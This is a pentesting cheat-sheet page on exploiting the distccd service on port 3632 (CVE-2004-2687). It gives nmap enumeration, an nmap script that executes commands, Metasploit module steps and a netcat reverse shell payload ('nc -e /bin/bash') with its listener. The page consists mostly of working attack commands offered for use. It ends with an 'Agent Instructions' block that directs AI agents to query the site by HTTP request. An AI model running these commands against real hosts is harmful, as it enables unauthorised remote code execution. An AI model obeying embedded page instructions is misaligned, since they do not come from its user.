# Distcc - Port 3632 {% tabs %} {% tab title="Support VeryLazyTech πŸŽ‰" %} * Become VeryLazyTech [**member**](https://shop.verylazytech.com/product-category/membership/)**! 🎁** * **Follow** us on: * **βœ– Twitter** [**@VeryLazyTech**](https://x.com/verylazytech)**.** * **πŸ‘Ύ Github** [**@VeryLazyTech**](https://github.com/verylazytech)**.** * **πŸ“œ Medium** [**@VeryLazyTech**](https://medium.com/@verylazytech)**.** * **πŸ“Ί YouTube** [**@VeryLazyTech**](https://www.youtube.com/@VeryLazyTechOfficial)**.** * **πŸ“© Telegram** [**@VeryLazyTech**](https://t.me/+mSGyb008VL40MmVk)**.** * **πŸ•΅οΈβ€β™‚οΈ My Site** [**@VeryLazyTech**](https://www.verylazytech.com/)**.** * Visit our [**shop** ](https://shop.verylazytech.com/)for e-books and courses. πŸ“š {% endtab %} {% endtabs %} ### **Basic info** **Distcc** (Distributed Compiler) is a tool designed to speed up code compilation by distributing the workload to multiple machines over a network. If a system is running the `distccd` daemon and is misconfigured (especially without authentication), it may allow an attacker to execute arbitrary commands remotely β€” a vulnerability famously tracked as **CVE-2004-2687**. *** ### **Key Details** * **Default Port:** `3632/tcp` * **Service Name:** `distccd` * **Purpose:** Distribute compilation tasks across multiple computers. * **Risk:** Remote Code Execution (RCE) if misconfigured. *** ### **Enumeration** #### **1. Port Discovery** First, check if the service is open: ```bash nmap -p 3632 PORT STATE SERVICE 3632/tcp open distccd ``` *** #### **2. Service Fingerprinting** Confirm it’s actually Distcc: ```bash nmap -sV -p 3632 ``` *** #### **3. Nmap CVE Check** Nmap has a script for CVE-2004-2687: ```bash nmap -p 3632 --script distcc-cve2004-2687 --script-args="distcc-exec.cmd='id'" ``` If the host is vulnerable, you should see the output of the `id` command in the scan results. *** ### **Exploitation** #### **1. Metasploit** Metasploit provides a dedicated module: ```bash msfconsole use exploit/unix/misc/distcc_exec set RHOSTS set RPORT 3632 set CMD id run ``` You can replace `id` with any command to execute remotely. *** #### **2. Manual Exploitation (Without Metasploit)** Distcc can execute shell commands by sending specially crafted requests. A quick PoC can be found here:\ πŸ”— [DarkCoderSc Gist](https://gist.github.com/DarkCoderSc/4dbf6229a93e75c3bdf6b467e67a9855) *** #### **Example: Reverse Shell Payload** ```bash nmap -p 3632 --script distcc-cve2004-2687 --script-args="distcc-exec.cmd='nc -e /bin/bash '" ``` On your attacking machine: ```bash nc -lvnp ``` *** {% hint style="success" %} Learn & practice [**For the Bug Bounty**](https://shop.verylazytech.com)
Support VeryLazyTech πŸŽ‰ * Become VeryLazyTech [**member**](https://shop.verylazytech.com/product-category/membership/)**! 🎁** * **Follow** us on: * **βœ– Twitter** [**@VeryLazyTech**](https://x.com/verylazytech)**.** * **πŸ‘Ύ Github** [**@VeryLazyTech**](https://github.com/verylazytech)**.** * **πŸ“œ Medium** [**@VeryLazyTech**](https://medium.com/@verylazytech)**.** * **πŸ“Ί YouTube** [**@VeryLazyTech**](https://www.youtube.com/@VeryLazyTechOfficial)**.** * **πŸ“© Telegram** [**@VeryLazyTech**](https://t.me/+mSGyb008VL40MmVk)**.** * **πŸ•΅οΈβ€β™‚οΈ My Site** [**@VeryLazyTech**](https://www.verylazytech.com/)**.** * Visit our [**shop** ](https://shop.verylazytech.com/)for e-books and courses. πŸ“š
{% endhint %} --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://www.verylazytech.com/distcc-port-3632.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.